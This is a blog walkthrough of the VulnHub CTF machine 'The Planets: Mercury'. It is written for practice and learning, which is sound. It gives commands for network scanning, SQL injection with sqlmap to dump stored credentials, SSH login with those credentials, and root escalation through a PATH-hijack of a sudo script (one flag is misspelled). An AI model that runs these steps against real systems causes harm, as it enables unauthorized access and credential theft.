The Planets Mercury Walkthrough

In this article, we are going to solve another vulnhub CTF The Planets Mercury. this is another boot to root challenge. and this VM is made by SirFlash. you can download here the machine.

Network Scanning

Let’s discover target IP address by using the netdiscover command.

sudo netdiscover

We discover an IP address in my case my target machine IP address is 192.168.43.110. now our next step is scanning all ports and running service by using the Nmap tool.

sudo nmap -A -p- 192.168.43.110
The Planets Mercury Walkthrough vulnhub

Enumeration

There are two ports are open 22/SSH and 8080 running http-proxy. now we navigate the target IP address in browser and we didn’t found here any useful stuff.

then we move the next step navigating common URLs and we see page not found error and we found an interested URL /mercuryfacts/

http://192.168.43.110:8080/admin
The Planets Mercury Walkthrough vulnhub

now we open the /mercuryfacts page and here we found nothing useful then we try some sql injection and again we face a SQL syntax error.

http://192.168.43.110:8080/mercuryfacts/
http://192.168.43.110:8080/mercuryfacts/1'

without wasting your time we jump the terminal and we open the sqlmap tool and we enumerate the Database name, Tables, and Columns and then we dump the all username and password by using the sqlmap command.

sqlmap --url http://192.168.43.110:8080/mercuryfacts -D mercury -T users -C username,password --dump --batch
The Planets Mercury Walkthrough vulnhub

Since we found many credentials in SQL Database we try this credentials for log in the SSH server. After the third try, we successfully login with the webmaster users.

ssh [email protected]
The Planets Mercury Walkthrough vulnhub

Now we have shell access target machine let’s enumerating the directory’s and files. we found our first flag in the webmaster home directory. and here we found a note.txt file we open the notes file using the cat command.

ls
cat user_flag.txt
cd mecury_proj/
ls
cat notes.txt

and here we see base64 encoded string let’s decode the base64 stuff and again we found another user linuxmaster password.

su linuxmaster
id

Privilege Escalation

we run the sudo -l command for check the sudo privilege for user Linuxmaster and we found the user Linuxmaster own sudo right for check_syslog.sh custom bash script. let’s escalate the privilege root user run the following command.

sudo -l
cat /usr/bin/check_syslog.sh
ln -s /bin/vi tail
export PATH=.:$PATH
sudo --preserver-env=PATH /usr/bin/check_syslog.sh

and we have a root shell target machine let’s move the /root directory and read our root flag. and We successfully complete the challenge by reading the root flag.

ls
cat root_flag.txt
The Planets Mercury Walkthrough vulnhub

CengBox: 1 link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →